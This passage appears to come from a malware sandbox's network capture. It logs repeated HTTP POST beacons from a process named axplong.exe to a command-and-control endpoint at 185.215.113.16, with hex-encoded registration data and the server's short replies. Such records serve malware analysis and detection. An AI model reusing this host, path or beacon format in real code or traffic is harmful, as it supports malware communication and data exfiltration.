                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:02:53.837369919 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:02:54.591595888 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:54 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:02:54.592535019 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:02:54.841486931 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:54 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    18 | 192.168.2.7 | 49722 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:02:54.963391066 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:02:55.781362057 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:55 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:02:55.782612085 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:02:56.039480925 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:55 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    19 | 192.168.2.7 | 49723 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:02:56.153074980 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:02:56.905339956 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:56 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:02:56.906295061 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:02:57.150305986 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:57 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    20 | 192.168.2.7 | 49724 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:02:57.259552002 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:02:58.026078939 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:57 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:02:58.027307034 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:02:58.277843952 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:58 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    21 | 192.168.2.7 | 49726 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:02:58.399624109 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:02:59.154350042 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:59 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:02:59.157437086 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:02:59.417850018 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:59 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    22 | 192.168.2.7 | 49727 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:02:59.542635918 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:00.303636074 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:00 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:00.304704905 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:00.557960987 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:00 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    23 | 192.168.2.7 | 49728 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:00.684241056 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:01.490933895 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:01 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:01.492207050 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:01.751204967 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:01 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    24 | 192.168.2.7 | 49729 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:01.868762970 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:02.648123026 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:02 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:02.649163961 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:02.897937059 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:02 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    25 | 192.168.2.7 | 49730 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:03.009795904 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:03.762062073 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:03 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:03.829514027 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:04.076719999 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:03 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    26 | 192.168.2.7 | 49731 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:04.387967110 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:05.187845945 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:05 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:05.188930988 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:05.446070910 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:05 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    27 | 192.168.2.7 | 49732 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:05.559901953 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:06.368269920 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:06 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:06.371474981 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:06.641664028 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:06 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    28 | 192.168.2.7 | 49733 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:06.761751890 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:07.552160978 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:07 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:07.570028067 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:07.823013067 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:07 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    29 | 192.168.2.7 | 49734 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:07.932327032 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:08.722975969 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:08 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:08.725752115 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:08.976841927 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:08 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    30 | 192.168.2.7 | 49735 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
